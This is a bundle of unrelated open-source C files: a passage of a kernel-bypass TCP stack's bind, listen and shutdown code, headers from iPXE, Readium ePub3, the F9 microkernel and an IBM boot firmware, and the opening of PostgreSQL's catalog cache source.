OO_SP_TO_INT(c_id), l_ni->state->stack_id, OO_SP_TO_INT(l_id), c_ni->state->stack_id, tls->s.b.bufid, rc); /* rc is usually -ERESTARTSYS, and it does not help user */ return -ENOBUFS; } } /* Accept as from tls */ if( !ci_tcp_acceptq_not_empty(tls) ) { /* it is possible, for example, if ci_tcp_listenq_try_promote() failed * because there are no endpoints */ ci_tcp_listenq_drop_all(c_ni, tls); citp_waitable_obj_free(c_ni, &tls->s.b); ci_netif_unlock(c_ni); return -EBUSY; } w = ci_tcp_acceptq_get(c_ni, tls); ci_assert(w); LOG_TV(ci_log("%s: %d:%d to %d:%d shadow %d:%d accepted %d:%d", __FUNCTION__, c_ni->state->stack_id, OO_SP_TO_INT(c_id), l_ni->state->stack_id, OO_SP_TO_INT(l_id), c_ni->state->stack_id, tls->s.b.bufid, c_ni->state->stack_id, w->bufid)); ci_assert(w->state & CI_TCP_STATE_TCP); ci_assert(w->state != CI_TCP_LISTEN); /* Destroy tls. * NB: nobody could possibly connect to it, so no need to do proper * shutdown. */ ci_assert_equal(ci_tcp_acceptq_n(tls), 0); ci_tcp_listenq_drop_all(c_ni, tls); citp_waitable_obj_free(c_ni, &tls->s.b); ci_netif_unlock(c_ni); /* Keep a port reference */ { tcp_helper_endpoint_t *l_ep, *a_ep; struct oo_file_ref* os_sock_ref; unsigned long lock_flags; l_ep = ci_trs_ep_get(netif2tcp_helper_resource(l_ni), l_id); a_ep = ci_trs_ep_get(netif2tcp_helper_resource(c_ni), W_SP(w)); spin_lock_irqsave(&l_ep->lock, lock_flags); os_sock_ref = l_ep->os_socket; ci_assert_equal(a_ep->os_port_keeper, NULL); if( os_sock_ref != NULL ) { os_sock_ref = oo_file_ref_add(os_sock_ref); os_sock_ref = oo_file_ref_xchg(&a_ep->os_port_keeper, os_sock_ref); spin_unlock_irqrestore(&l_ep->lock, lock_flags); if( os_sock_ref != NULL ) oo_file_ref_drop(os_sock_ref); } else { spin_unlock_irqrestore(&l_ep->lock, lock_flags); goto cleanup; } } /* lock l_ni: Check that l_id is the same socket it used to be */ /* create ref-sock in l_ni, put it into acc q */ if( ci_netif_lock(l_ni) != 0 ) goto cleanup; if( alien_tls->s.b.state != CI_TCP_LISTEN || (alien_tls->s.b.sb_aflags & CI_SB_AFLAG_ORPHAN) || S_IPX_TCP_HDR(&alien_tls->s)->tcp_source_be16 != TS_IPX_TCP(ts)->tcp_dest_be16 || (!CI_IPX_ADDR_IS_ANY(alien_tls->s.laddr) && !CI_IPX_ADDR_EQ(alien_tls->s.laddr, sock_ipx_raddr(&ts->s))) ) { ci_netif_unlock(l_ni); goto cleanup; } ci_bit_mask_set(&w->sb_aflags, CI_SB_AFLAG_TCP_IN_ACCEPTQ | CI_SB_AFLAG_ORPHAN); wo = citp_waitable_obj_alloc(l_ni); if( wo == NULL ) { ci_netif_unlock(l_ni); goto cleanup; } wo->waitable.state = CI_TCP_CLOSED; wo->waitable.sb_aflags |= CI_SB_AFLAG_MOVED_AWAY; wo->waitable.moved_to_stack_id = c_ni->state->stack_id; wo->waitable.moved_to_sock_id = W_SP(w); LOG_TC(log("%s: put to acceptq %d:%d referencing %d:%d", __func__, l_ni->state->stack_id, OO_SP_TO_INT(W_SP(&wo->waitable)), c_ni->state->stack_id, OO_SP_TO_INT(W_SP(w)))); ci_tcp_acceptq_put(l_ni, alien_tls, &wo->waitable); citp_waitable_wake_not_in_poll(l_ni, &alien_tls->s.b, CI_SB_FLAG_WAKE_RX); ci_netif_unlock(l_ni); return rc; cleanup: ci_assert(w->sb_aflags & CI_SB_AFLAG_ORPHAN); ci_bit_mask_clear(&w->sb_aflags, CI_SB_AFLAG_TCP_IN_ACCEPTQ | CI_SB_AFLAG_ORPHAN); efab_tcp_helper_close_endpoint(netif2tcp_helper_resource(c_ni), w->bufid); /* we can not guarantee c_ni lock, so we can' call * ci_tcp_drop(c_ni, ts). So, we return error; UL will handover * and close ts endpoint. */ return -EBUSY; } #endif #ifndef __KERNEL__ /* Set a reuseport bind on a socket. */ int ci_tcp_reuseport_bind(ci_sock_cmn* sock, ci_fd_t fd) { int rc; /* With legacy reuseport we delay the __ci_tcp_bind actions to avoid errors * when trying to re-use a port for the os socket, so won't have set the * PORT_BOUND flag yet. */ ci_assert(((sock->s_flags & CI_SOCK_FLAG_PORT_BOUND) != 0)); ci_assert_nequal(sock->s_flags & CI_SOCK_FLAG_REUSEPORT, 0); if ( (rc = ci_tcp_ep_reuseport_bind(fd, CITP_OPTS.cluster_name, CITP_OPTS.cluster_size, CITP_OPTS.cluster_restart_opt, CITP_OPTS.cluster_hot_restart_opt, sock_ipx_laddr(sock), sock_lport_be16(sock))) != 0 ) { errno = -rc; return -1; } return 0; } /* In this bind handler we just check that the address to which * are binding is either "any" or one of ours. */ int ci_tcp_bind(citp_socket* ep, const struct sockaddr* my_addr, socklen_t addrlen, ci_fd_t fd ) { ci_uint16 new_port; ci_addr_t addr; ci_sock_cmn* s = ep->s; ci_tcp_state* c = &SOCK_TO_WAITABLE_OBJ(s)->tcp; int rc = 0; CHECK_TEP(ep); ci_assert(ci_netif_is_locked(ep->netif)); /* Check if state of the socket is OK for bind operation. */ /* \todo Earlier (TS_TCP( epi->tcpep.state )->tcp_source_be16) is used. * What is better? */ if (my_addr == NULL) RET_WITH_ERRNO( EINVAL ); if (s->b.state != CI_TCP_CLOSED) RET_WITH_ERRNO( EINVAL ); if (c->tcpflags & CI_TCPT_FLAG_WAS_ESTAB) RET_WITH_ERRNO( EINVAL ); /* There should be address length check before address family validation to * match Linux errno value set in inet6_bind(). */ if (s->domain == PF_INET6 && addrlen < SIN6_LEN_RFC2133) RET_WITH_ERRNO( EINVAL ); if( my_addr->sa_family != s->domain ) RET_WITH_ERRNO( EAFNOSUPPORT ); /* sin_port and sin6_port share tha same place in the sockaddr */ new_port = ((struct sockaddr_in*)my_addr)->sin_port; /* Bug 4884: Windows regularly uses addrlen > sizeof(struct sockaddr_in) * Linux is also relaxed about overlength data areas. */ if (s->domain == PF_INET && addrlen < sizeof(struct sockaddr_in)) RET_WITH_ERRNO( EINVAL ); #if CI_CFG_FAKE_IPV6 #if ! CI_CFG_IPV6 if( s->domain == PF_INET6 && !ci_tcp_ipv6_is_ipv4(my_addr) ) goto handover; #else if( s->domain == PF_INET6 && (s->s_flags & CI_SOCK_FLAG_V6ONLY) && CI_IP6_IS_V4MAPPED(&CI_SIN6(my_addr)->sin6_addr) ) goto handover; #endif #endif if( ((s->s_flags & CI_SOCK_FLAG_TPROXY) != 0) && (new_port == 0) ) { NI_LOG(ep->netif, USAGE_WARNINGS, "Sockets with IP_TRANSPARENT set must " "be explicitly bound to a port to be accelerated"); goto handover; } addr = ci_get_addr(my_addr); /* In scalable RSS mode accelerated 127.* sockets cause issues: * * with SO_REUSEPORT they would fail at listen * * without SO_REUSEPORT they would end up in non-rss stack degrading performance * with lock contention, epoll3 and accelerated loopback */ if( CI_IPX_IS_LOOPBACK(addr) && NI_OPTS(ep->netif).scalable_filter_enable != CITP_SCALABLE_FILTERS_DISABLE && ((NI_OPTS(ep->netif).scalable_filter_mode & (CITP_SCALABLE_MODE_PASSIVE | CITP_SCALABLE_MODE_RSS)) == (CITP_SCALABLE_MODE_PASSIVE | CITP_SCALABLE_MODE_RSS)) ) goto handover; if( ((s->s_flags & CI_SOCK_FLAG_TPROXY) != 0) && CI_IPX_ADDR_IS_ANY(addr) ) { NI_LOG(ep->netif, USAGE_WARNINGS, "Sockets with IP_TRANSPARENT set must " "be explicitly bound to an address to be accelerated"); goto handover; } /* Using the port number provided, see if we can do this bind */ if( CITP_OPTS.tcp_reuseports != 0 && new_port != 0 ) { struct ci_port_list *force_reuseport; CI_DLLIST_FOR_EACH2(struct ci_port_list, force_reuseport, link, (ci_dllist*)(ci_uintptr_t)CITP_OPTS.tcp_reuseports) { if( force_reuseport->port == new_port ) { int one = 1; if( ep->s->b.sb_aflags & CI_SB_AFLAG_OS_BACKED ) { ci_fd_t os_sock = ci_get_os_sock_fd(fd); ci_assert(CI_IS_VALID_SOCKET(os_sock)); rc = ci_sys_setsockopt(os_sock, SOL_SOCKET, SO_REUSEPORT, &one, sizeof(one)); ci_rel_os_sock_fd(os_sock); /* Fixme: shouldn't we handle errors? */ } else if( (s->s_flags & CI_SOCK_FLAG_TPROXY) == 0 ) { rc = ci_tcp_helper_os_sock_create_and_set(ep->netif, fd, s, SOL_SOCKET, SO_REUSEPORT, (char*)&one, sizeof(one)); } if( rc != 0 ) { log("%s: failed to set SO_REUSEPORT on OS socket: " "rc=%d errno=%d", __func__, rc, errno); } ep->s->s_flags |= CI_SOCK_FLAG_REUSEPORT; LOG_TC(log("%s "SF_FMT", applied legacy SO_REUSEPORT flag for port %u", __FUNCTION__, SF_PRI_ARGS(ep, fd), new_port)); } } } #if CI_CFG_IPV6 if( CI_IPX_IS_LINKLOCAL(addr) && ci_sock_set_ip6_scope_id(ep->netif, s, my_addr, addrlen, 0) ) goto handover; #endif CI_LOGLEVEL_TRY_RET(LOG_TV, __ci_tcp_bind(ep->netif, ep->s, fd, addr, &new_port, 1)); ep->s->s_flags |= CI_SOCK_FLAG_BOUND; #if CI_CFG_IPV6 ci_tcp_ipcache_convert(CI_ADDR_AF(addr), c); #endif ci_sock_cmn_set_laddr(ep->s, addr, new_port); ci_sock_set_raddr_port(s, addr_any, 0); LOG_TC(log(LPF "bind to "IPX_FMT":%u n_p:%u lp:%u", IPX_ARG(AF_IP(addr)), CI_BSWAP_BE16(((struct sockaddr_in*)my_addr)->sin_port), CI_BSWAP_BE16(new_port), CI_BSWAP_BE16(sock_lport_be16(s)))); return 0; handover: if( !(ep->s->b.sb_aflags & CI_SB_AFLAG_OS_BACKED) ) { rc = ci_tcp_helper_os_sock_create_and_set(ep->netif, fd, s, -1, 0, NULL, 0); if( rc < 0 ) RET_WITH_ERRNO(errno); } return CI_SOCKET_HANDOVER; } /* Set the socket to listen, the reorder buffer and txq become ** the listen state, and it is initialised ** \todo split this overlong function up! ** ** NOTE: [fd] is unused in the kernel version */ int ci_tcp_listen(citp_socket* ep, ci_fd_t fd, int backlog) { /* ** ?? error handling on possible fails not handled robustly... ** ?? Need to check port number is valid TODO */ /*! \todo If not bound then we have to be listening on all interfaces. * It's likely that we won't be coming through here as we have to * listen on the OS socket too! */ ci_tcp_state* ts; ci_tcp_socket_listen* tls; ci_netif* netif = ep->netif; ci_sock_cmn* s = ep->s; unsigned ul_backlog = backlog; int rc; int scalable; int will_accelerate; LOG_TC(log("%s "SK_FMT" listen backlog=%d", __FUNCTION__, SK_PRI_ARGS(ep), backlog)); CHECK_TEP(ep); scalable = ci_tcp_use_mac_filter_listen(netif, s, s->cp.so_bindtodevice); if( s->s_flags & CI_SOCK_FLAG_DEFERRED_BIND ) complete_deferred_bind(netif, s, fd); if( NI_OPTS(netif).tcp_listen_handover ) return CI_SOCKET_HANDOVER; /* We should handover if the socket is bound to alien address. */ will_accelerate = ~s->s_flags & CI_SOCK_FLAG_BOUND_ALIEN || scalable || ( netif->state->flags & CI_NETIF_FLAG_USE_ALIEN_LADDRS && ! CI_IPX_IS_LOOPBACK(sock_ipx_laddr(s)) ); if( !NI_OPTS(netif).tcp_server_loopback && ! will_accelerate ) return CI_SOCKET_HANDOVER; if( ul_backlog < 0 ) ul_backlog = NI_OPTS(netif).max_ep_bufs; else if( ul_backlog < NI_OPTS(netif).acceptq_min_backlog ) ul_backlog = NI_OPTS(netif).acceptq_min_backlog; if( s->b.state == CI_TCP_LISTEN ) { tls = SOCK_TO_TCP_LISTEN(s); ci_netif_lock(ep->netif); tls->acceptq_max = ul_backlog; if( (s->s_flags & CI_SOCK_FLAG_SCALPASSIVE) == 0 || NI_OPTS(netif).scalable_listen != CITP_SCALABLE_LISTEN_ACCELERATED_ONLY ) ci_tcp_helper_listen_os_sock(fd, ul_backlog); ci_netif_unlock(ep->netif); return 0; } if( s->b.state != CI_TCP_CLOSED ) { CI_SET_ERROR(rc, EINVAL); return rc; } ts = SOCK_TO_TCP(s); /* Bug 3376: if socket used for a previous, failed, connect then the error * numbers will not be as expected. Only seen when not using listening * netifs (as moving the EP to the new netif resets them). */ ts->s.tx_errno = EPIPE; ts->s.rx_errno = ENOTCONN; ci_sock_lock(netif, &ts->s.b); ci_netif_lock(ep->netif); /* fill in address/ports and all TCP state */ if( ts->s.s_flags & CI_SOCK_FLAG_CONNECT_MUST_BIND ) { ci_uint16 source_be16; /* They haven't previously done a bind, so we need to choose * a port. As we haven't been given a hint we let the OS choose. * * NB The previously-calculated will_accelerate variable remains valid, * because this call __ci_tcp_bind() never results in * CI_SOCK_FLAG_BOUND_ALIEN flag being set. */ source_be16 = 0; rc = __ci_tcp_bind(ep->netif, ep->s, fd, ts->s.laddr, &source_be16, 0); if (CI_LIKELY( rc==0 )) { TS_IPX_TCP(ts)->tcp_source_be16 = source_be16; ts->s.cp.lport_be16 = source_be16; LOG_TC(log(LNT_FMT "listen: our bind returned "IPX_FMT":%u", LNT_PRI_ARGS(ep->netif, ts), IPX_ARG(AF_IP(ts->s.laddr)), (unsigned) CI_BSWAP_BE16(TS_IPX_TCP(ts)->tcp_source_be16))); } else { LOG_U(ci_log("__ci_tcp_bind returned %d at %s:%d", CI_GET_ERROR(rc), __FILE__, __LINE__)); ci_netif_unlock(ep->netif); ci_sock_unlock(netif, &ts->s.b); return rc; } } ci_tcp_set_slow_state(netif, ts, CI_TCP_LISTEN); tls = SOCK_TO_TCP_LISTEN(&ts->s); ipx_hdr_set_daddr(ipcache_af(&tls->s.pkt), &tls->s.pkt.ipx, addr_any); tcp_rport_be16(tls) = 0u; ci_assert_equal(tls->s.tx_errno, EPIPE); ci_assert_equal(tls->s.rx_errno, ENOTCONN); /* Listen timer should be initialized before the first return statement, * because __ci_tcp_listen_to_normal() will be called on error path. */ rc = ci_tcp_listen_init(netif, tls); /* Drop the socket lock */ ci_netif_unlock(ep->netif); ci_sock_unlock(netif, &ts->s.b); ci_netif_lock(ep->netif); if( rc != 0 ) { CI_SET_ERROR(rc, -rc); goto listen_fail; } tls->acceptq_max = ul_backlog; CITP_STATS_TCP_LISTEN(CI_ZERO(&tls->stats)); /* install all the filters needed for this connection * - tcp_laddr_be32(ts) = 0 for IPADDR_ANY * * TODO: handle BINDTODEVICE by setting phys_port paramter to correct * physical L5 port index * TODO: handle REUSEADDR by setting last paramter to TRUE */ if( will_accelerate ) { #ifdef ONLOAD_OFE if( netif->ofe_channel != NULL ) { tls->s.ofe_code_start = ofe_socktbl_find( netif->ofe, OFE_SOCKTYPE_TCP_LISTEN, tcp_laddr_be32(tls), INADDR_ANY, tcp_lport_be16(ts), 0); tls->ofe_promote = ofe_socktbl_find( netif->ofe, OFE_SOCKTYPE_TCP_PASSIVE, tcp_laddr_be32(tls), INADDR_ANY, tcp_lport_be16(ts), 0); } else { tls->s.ofe_code_start = OFE_ADDR_NULL; tls->ofe_promote = OFE_ADDR_NULL; } #endif if( scalable ) tls->s.s_flags |= CI_SOCK_FLAG_SCALPASSIVE; rc = ci_tcp_ep_set_filters(netif, S_SP(tls), tls->s.cp.so_bindtodevice, OO_SP_NULL); if( rc == -EFILTERSSOME ) { if( CITP_OPTS.no_fail ) rc = 0; else { ci_tcp_ep_clear_filters(netif, S_SP(tls), 0); rc = -ENOBUFS; } } ci_assert_nequal(rc, -EFILTERSSOME); VERB(ci_log("%s: set_filters returned %d", __FUNCTION__, rc)); if (rc < 0) { if( s->s_flags & CI_SOCK_FLAG_BOUND_ALIEN && NI_OPTS(netif).tcp_server_loopback ) { /* That alien address can't be served by filters despite * CI_NETIF_FLAG_USE_ALIEN_LADDRS. We'll accelerate loopback in * any case. */ rc = 0; } else { CI_SET_ERROR(rc, -rc); goto post_listen_fail; } } } ci_assert_equal(rc, 0); /* * Call of system listen() is required for listen any, local host * communications server and multi-homed server (to accept connections * to L5 assigned address(es), but incoming from other interfaces). * The exception is scalable passive mode where we avoid listen on * OS socket to avoid kernel LHTABLE related performance degradation. */ if( (s->s_flags & CI_SOCK_FLAG_SCALPASSIVE) == 0 || NI_OPTS(netif).scalable_listen != CITP_SCALABLE_LISTEN_ACCELERATED_ONLY ) { #ifdef __ci_driver__ rc = efab_tcp_helper_listen_os_sock( netif2tcp_helper_resource(netif), S_SP(tls), backlog); #else rc = ci_tcp_helper_listen_os_sock(fd, backlog); #endif } if ( rc < 0 ) { /* clear the filter we've just set */ ci_tcp_ep_clear_filters(netif, S_SP(tls), 0); goto post_listen_fail; } ci_netif_unlock(ep->netif); return 0; post_listen_fail: ci_tcp_listenq_drop_all(netif, tls); listen_fail: /* revert TCP state to a non-listening socket format */ __ci_tcp_listen_to_normal(netif, tls); /* Above function sets orphan flag but we are attached to an FD. */ ci_bit_clear(&tls->s.b.sb_aflags, CI_SB_AFLAG_ORPHAN_BIT); ci_netif_unlock(ep->netif); #ifdef __ci_driver__ return rc; #else return CI_SOCKET_ERROR; #endif } static int ci_tcp_shutdown_listen(citp_socket* ep, int how, ci_fd_t fd) { ci_tcp_socket_listen* tls = SOCK_TO_TCP_LISTEN(ep->s); if( how == SHUT_WR ) return 0; ci_sock_lock(ep->netif, &tls->s.b); ci_netif_lock(ep->netif); LOG_TC(ci_log(SK_FMT" shutdown(SHUT_RD)", SK_PRI_ARGS(ep))); __ci_tcp_listen_shutdown(ep->netif, tls, fd); __ci_tcp_listen_to_normal(ep->netif, tls); { ci_fd_t os_sock = ci_get_os_sock_fd(fd); int flags = ci_sys_fcntl(os_sock, F_GETFL); flags &= (~O_NONBLOCK); CI_TRY(ci_sys_fcntl(os_sock, F_SETFL, flags)); ci_rel_os_sock_fd(os_sock); } citp_waitable_wake_not_in_poll(ep->netif, &tls->s.b, CI_SB_FLAG_WAKE_RX | CI_SB_FLAG_WAKE_TX); ci_netif_unlock(ep->netif); ci_sock_unlock(ep->netif, &tls->s.b); return 0; } int ci_tcp_shutdown(citp_socket* ep, int how, ci_fd_t fd) { ci_sock_cmn* s = ep->s; int rc; if( s->b.state == CI_TCP_LISTEN ) return ci_tcp_shutdown_listen(ep, how, fd); if( SOCK_TO_TCP(s)->snd_delegated ) { /* We do not know which seq number to use. Call * onload_delegated_send_cancel(). */ CI_SET_ERROR(rc, EBUSY); return rc; } if( ! ci_netif_trylock(ep->netif) ) { /* Can't get lock, so try to defer shutdown to the lock holder. */ unsigned flags = 0; switch( s->b.state ) { case CI_TCP_CLOSED: case CI_TCP_TIME_WAIT: CI_SET_ERROR(rc, ENOTCONN); return rc; } if( how == SHUT_RD || how == SHUT_RDWR ) flags |= CI_SOCK_AFLAG_NEED_SHUT_RD; if( how == SHUT_WR || how == SHUT_RDWR ) flags |= CI_SOCK_AFLAG_NEED_SHUT_WR; ci_atomic32_or(&s->s_aflags, flags); if( ci_netif_lock_or_defer_work(ep->netif, &s->b) ) ci_netif_unlock(ep->netif); return 0; } rc = __ci_tcp_shutdown(ep->netif, SOCK_TO_TCP(s), how); ci_netif_unlock(ep->netif); if( rc < 0 ) CI_SET_ERROR(rc, -rc); return rc; } void ci_tcp_get_peer_addr(ci_tcp_state* ts, struct sockaddr* name, socklen_t* namelen) { int af = ipcache_af(&ts->s.pkt); int /*bool*/ dnat = ts->s.s_flags & CI_SOCK_FLAG_DNAT; ci_addr_t raddr = dnat ? ts->pre_nat.daddr_be32 : tcp_ipx_raddr(ts); ci_uint16 port = dnat ? ts->pre_nat.dport_be16 : TS_IPX_TCP(ts)->tcp_dest_be16; ci_addr_to_user(name, namelen, af, ts->s.domain, port, CI_IPX_ADDR_PTR(af, raddr), ts->s.cp.so_bindtodevice); } int ci_tcp_getpeername(citp_socket* ep, struct sockaddr* name, socklen_t* namelen) { ci_sock_cmn* s = ep->s; int rc; CHECK_TEP_NNL(ep); /* If we're not connected... */ if( ! (s->b.state & CI_TCP_STATE_SYNCHRONISED) || s->b.state == CI_TCP_TIME_WAIT ) CI_SET_ERROR(rc, ENOTCONN); else if( name == NULL || namelen == NULL ) CI_SET_ERROR(rc, EFAULT); else { rc = 0; if( s->b.state != CI_TCP_LISTEN ) ci_tcp_get_peer_addr(SOCK_TO_TCP(s), name, namelen); } return rc; } int ci_tcp_getsockname(citp_socket* ep, ci_fd_t fd, struct sockaddr* sa, socklen_t* p_sa_len) { ci_sock_cmn* s = ep->s; int rc = 0; /* Check consistency of multitude of bind flags */ ci_tcp_bind_flags_assert_valid(s); if( s->s_flags & CI_SOCK_FLAG_DEFERRED_BIND ) complete_deferred_bind(ep->netif, s, fd); return rc; } #endif
{ "language": "C" }
#ifndef _IPXE_RETRY_H #define _IPXE_RETRY_H /** @file * * Retry timers * */ FILE_LICENCE ( GPL2_OR_LATER ); #include <ipxe/list.h> /** Default timeout value */ #define DEFAULT_MIN_TIMEOUT ( TICKS_PER_SEC / 4 ) /** Limit after which the timeout will be deemed permanent */ #define DEFAULT_MAX_TIMEOUT ( 10 * TICKS_PER_SEC ) /** A retry timer */ struct retry_timer { /** List of active timers */ struct list_head list; /** Timer is currently running */ unsigned int running; /** Timeout value (in ticks) */ unsigned long timeout; /** Minimum timeout value (in ticks) * * A value of zero means "use default timeout." */ unsigned long min_timeout; /** Maximum timeout value before failure (in ticks) * * A value of zero means "use default timeout." */ unsigned long max_timeout; /** Start time (in ticks) */ unsigned long start; /** Retry count */ unsigned int count; /** Timer expired callback * * @v timer Retry timer * @v fail Failure indicator * * The timer will already be stopped when this method is * called. The failure indicator will be True if the retry * timeout has already exceeded @c MAX_TIMEOUT. */ void ( * expired ) ( struct retry_timer *timer, int over ); /** Reference counter * * If this interface is not part of a reference-counted * object, this field may be NULL. */ struct refcnt *refcnt; }; /** * Initialise a timer * * @v timer Retry timer * @v expired Timer expired callback * @v refcnt Reference counter, or NULL */ static inline __attribute__ (( always_inline )) void timer_init ( struct retry_timer *timer, void ( * expired ) ( struct retry_timer *timer, int over ), struct refcnt *refcnt ) { timer->expired = expired; timer->refcnt = refcnt; } /** * Initialise a static timer * * @v expired_fn Timer expired callback */ #define TIMER_INIT( expired_fn ) { \ .expired = (expired_fn), \ } extern void start_timer ( struct retry_timer *timer ); extern void start_timer_fixed ( struct retry_timer *timer, unsigned long timeout ); extern void stop_timer ( struct retry_timer *timer ); extern void retry_poll ( void ); /** * Start timer with no delay * * @v timer Retry timer * * This starts the timer running with a zero timeout value. */ static inline void start_timer_nodelay ( struct retry_timer *timer ) { start_timer_fixed ( timer, 0 ); } /** * Test to see if timer is currently running * * @v timer Retry timer * @ret running Non-zero if timer is running */ static inline __attribute__ (( always_inline )) unsigned long timer_running ( struct retry_timer *timer ) { return ( timer->running ); } #endif /* _IPXE_RETRY_H */
{ "language": "C" }
// // initialization.h // ePub3 // // Created by Bluefire MBP2 on 7/31/13. // Copyright (c) 2014 Readium Foundation and/or its licensees. All rights reserved. // // Redistribution and use in source and binary forms, with or without modification, // are permitted provided that the following conditions are met: // 1. Redistributions of source code must retain the above copyright notice, this // list of conditions and the following disclaimer. // 2. Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation and/or // other materials provided with the distribution. // 3. Neither the name of the organization nor the names of its contributors may be // used to endorse or promote products derived from this software without specific // prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND // ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED // WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. // IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, // BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF // LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE // OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. #ifndef ePub3_initialization_h #define ePub3_initialization_h #include <ePub3/epub3.h> EPUB3_BEGIN_NAMESPACE void InitializeSdk(); void PopulateFilterManager(); EPUB3_END_NAMESPACE #endif
{ "language": "C" }
/* Copyright (c) 2013 The F9 Microkernel Project. All rights reserved. * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ #ifndef LIB_KTABLE_H_ #define LIB_KTABLE_H_ #include <platform/armv7m.h> #include <platform/link.h> #include <lib/bitmap.h> #include <types.h> struct ktable { char *tname; bitmap_ptr_t bitmap; ptr_t data; size_t num; size_t size; }; typedef struct ktable ktable_t; #define DECLARE_KTABLE(type, name, num_) \ DECLARE_BITMAP(kt_ ## name ## _bitmap, num_); \ static __KTABLE type kt_ ## name ## _data[num_]; \ ktable_t name = { \ .tname = #name, \ .bitmap = kt_ ## name ## _bitmap, \ .data = (ptr_t) kt_ ## name ## _data, \ .num = num_, .size = sizeof(type) \ } void ktable_init(ktable_t *kt); int ktable_is_allocated(ktable_t *kt, int i); void *ktable_alloc_id(ktable_t *kt, int i); void *ktable_alloc(ktable_t *kt); void ktable_free(ktable_t *kt, void *element); uint32_t ktable_getid(ktable_t *kt, void *element); /* * For each ALLOCATED element in ktable * Should be used as: * * type *el; * int idx; * * for_each_in_ktable(el, idx, my_ktable) { * ... * } * */ #define for_each_in_ktable(el, idx, kt) \ for (el = (typeof(el)) (kt)->data, idx = 0; idx < (kt)->num; ++idx, ++el) \ if (bitmap_get_bit(bitmap_cursor((kt)->bitmap, idx)) == 1) #endif /* LIB_KTABLE_H_ */
{ "language": "C" }
/****************************************************************************** * Copyright (c) 2004, 2008 IBM Corporation * All rights reserved. * This program and the accompanying materials * are made available under the terms of the BSD License * which accompanies this distribution, and is available at * http://www.opensource.org/licenses/bsd-license.php * * Contributors: * IBM Corporation - initial implementation *****************************************************************************/ #ifndef BOOT_ABORT_H #define BOOT_ABORT_H /* boot abort function suitable for assembly */ #define BOOT_ABORT(cap, action, msg, numhint) \ li r3, cap; \ li r4, action; \ LOAD32(r5, msg); \ LOAD32(r6, numhint); \ bl boot_abort /* boot abort function suitable called from c (takes r3 as hint) */ #define BOOT_ABORT_R3HINT(cap, action, msg) \ mr r6, r3; \ li r3, cap; \ li r4, action; \ LOAD32(r5, msg); \ bl boot_abort #define ABORT_CANIO (1 << 0) #define ABORT_NOIO (1 << 1) #define ALTBOOT (1 << 0) #define HALT (1 << 1) #endif
{ "language": "C" }
/*------------------------------------------------------------------------- * * catcache.c * System catalog cache for tuples matching a key. * * Portions Copyright (c) 1996-2013, PostgreSQL Global Development Group * Portions Copyright (c) 1994, Regents of the University of California * * * IDENTIFICATION * src/backend/utils/cache/catcache.c * *------------------------------------------------------------------------- */ #include "postgres.h" #include "access/genam.h" #include "access/hash.h" #include "access/heapam.h" #include "access/relscan.h" #include "access/sysattr.h" #include "access/tuptoaster.h" #include "access/valid.h" #include "catalog/pg_operator.h" #include "catalog/pg_type.h" #include "miscadmin.h" #ifdef CATCACHE_STATS #include "storage/ipc.h" /* for on_proc_exit */ #endif #include "storage/lmgr.h" #include "utils/builtins.h" #include "utils/fmgroids.h" #include "utils/inval.h" #include "utils/memutils.h" #include "utils/rel.h" #include "utils/resowner_private.h" #include "utils/syscache.h" #include "utils/tqual.h" /* #define CACHEDEBUG */ /* turns DEBUG elogs on */ /* * Given a hash value and the size of the hash table, find the bucket * in which the hash value belongs. Since the hash table must contain * a power-of-2 number of elements, this is a simple bitmask. */ #define HASH_INDEX(h, sz) ((Index) ((h) & ((sz) - 1))) /* * variables, macros and other stuff */ #ifdef CACHEDEBUG #define CACHE1_elog(a,b) elog(a,b) #define CACHE2_elog(a,b,c) elog(a,b,c) #define CACHE3_elog(a,b,c,d) elog(a,b,c,d) #define CACHE4_elog(a,b,c,d,e) elog(a,b,c,d,e) #define CACHE5_elog(a,b,c,d,e,f) elog(a,b,c,d,e,f) #define CACHE6_elog(a,b,c,d,e,f,g) elog(a,b,c,d,e,f,g) #else #define CACHE1_elog(a,b) #define CACHE2_elog(a,b,c) #define CACHE3_elog(a,b,c,d) #define CACHE4_elog(a,b,c,d,e) #define CACHE5_elog(a,b,c,d,e,f) #define CACHE6_elog(a,b,c,d,e,f,g) #endif /* Cache management header --- pointer is NULL until created */ static CatCacheHeader *CacheHdr = NULL; static uint32 CatalogCacheComputeHashValue(CatCache *cache, int nkeys, ScanKey cur_skey); static uint32 CatalogCacheComputeTupleHashValue(CatCache *cache, HeapTuple tuple); #ifdef CATCACHE_STATS static void CatCachePrintStats(int code, Datum arg); #endif static void CatCacheRemoveCTup(CatCache *cache, CatCTup *ct); static void CatCacheRemoveCList(CatCache *cache, CatCList *cl); static void CatalogCacheInitializeCache(CatCache *cache); static CatCTup *CatalogCacheCreateEntry(CatCache *cache, HeapTuple ntp, uint32 hashValue, Index hashIndex, bool negative); static HeapTuple build_dummy_tuple(CatCache *cache, int nkeys, ScanKey skeys); /* * internal support functions */ /* * Look up the hash and equality functions for system types that are used * as cache key fields. * * XXX this should be replaced by catalog lookups, * but that seems to pose considerable risk of circularity... */ static void GetCCHashEqFuncs(Oid keytype, PGFunction *hashfunc, RegProcedure *eqfunc) { switch (keytype) { case BOOLOID: *hashfunc = hashchar; *eqfunc = F_BOOLEQ; break; case CHAROID: *hashfunc = hashchar; *eqfunc = F_CHAREQ; break; case NAMEOID: *hashfunc = hashname; *eqfunc = F_NAMEEQ; break; case INT2OID: *hashfunc = hashint2; *eqfunc = F_INT2EQ; break; 